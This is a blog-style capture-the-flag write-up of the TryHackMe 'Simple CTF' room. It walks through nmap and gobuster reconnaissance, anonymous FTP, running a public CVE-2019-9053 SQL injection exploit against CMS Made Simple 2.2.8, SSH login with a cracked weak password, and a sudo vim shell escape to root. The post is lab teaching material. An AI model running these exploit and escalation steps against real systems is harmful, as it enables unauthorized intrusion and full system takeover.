The FTP server was anonymous. The password was “secret”. The vim binary was sudo. This box didn’t hide anything, it just waited to see if you’d look.
Some rooms on TryHackMe are designed to humble you.
Simple CTF is not one of them. It’s designed to teach you something more valuable than a complex exploit chain. It’s designed to teach you where to look. A note on an FTP server. A CMS version number. A single line from sudo -l. That's all it took.
Three services. Three mistakes. Full root.
Let’s walk through it.
Reconnaissance
nmap -sC -sV -oN simple.nmap 10.0.0.221/tcp open ftp vsftpd
80/tcp open http Apache
2222/tcp open ssh OpenSSHSSH on a non-standard port — 2222 instead of 22. Small detail, worth noting. Everything else looks familiar. Port 80 is where the story starts, but the FTP server drops the first hint.
FTP — Anonymous and Talkative
ftp 10.0.0.2
# Login: anonymousAnonymous login allowed. Inside, a note of someone complaining that the developer used a weak password for a system account.
This is not a red herring. This is the box talking to you directly.
Get Yuky’s stories in your inbox
Join Medium for free to get updates from this writer.
File it away and move on.
Web Enumeration — Finding the CMS
The default Apache page greets you on port 80. Nothing useful on the surface, so let Gobuster do the work:
gobuster dir -u http://10.0.0.2/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt/simple/ comes back. Navigate there, it's a CMS Made Simple installation, and it's kind enough to display its version number in the footer:
CMS Made Simple 2.2.8Exploitation — CVE-2019–9053
A quick search confirms it: CMS Made Simple 2.2.8 is vulnerable to CVE-2019–9053, an unauthenticated time-based blind SQL injection in the news module.
python3 exploit.py -u http://10.0.0.2/simple/ --crack -w /usr/share/wordlists/rockyou.txtThe exploit extracts a username, a password hash, and a salt. Crack it and the password comes back:
username: mitch
password: secretThe FTP note was right. Weak password. Same one used across the system.
Foothold — SSH on Port 2222
ssh [email protected] -p 2222Shell as mitch. The user flag is sitting in the home directory:
cat /home/mitch/user.txtOne credential. One note that told you it was weak. That’s all it took.
Privilege Escalation — vim Is Not Just a Text Editor
sudo -lUser mitch may run the following commands:
(root) NOPASSWD: /usr/bin/vimvim. With sudo. No password required.
Most people see vim and think text editor. On a penetration test, you see vim with sudo and you think shell escape.
GTFOBins documents this perfectly:
sudo vim -c ':!/bin/bash'vim opens, executes the command, drops you into a bash shell as root.
cat /root/root.txtDone.
Simple CTF is a free room on TryHackMe. This writeup is for educational purposes only. All testing performed on dedicated lab infrastructure with explicit authorization.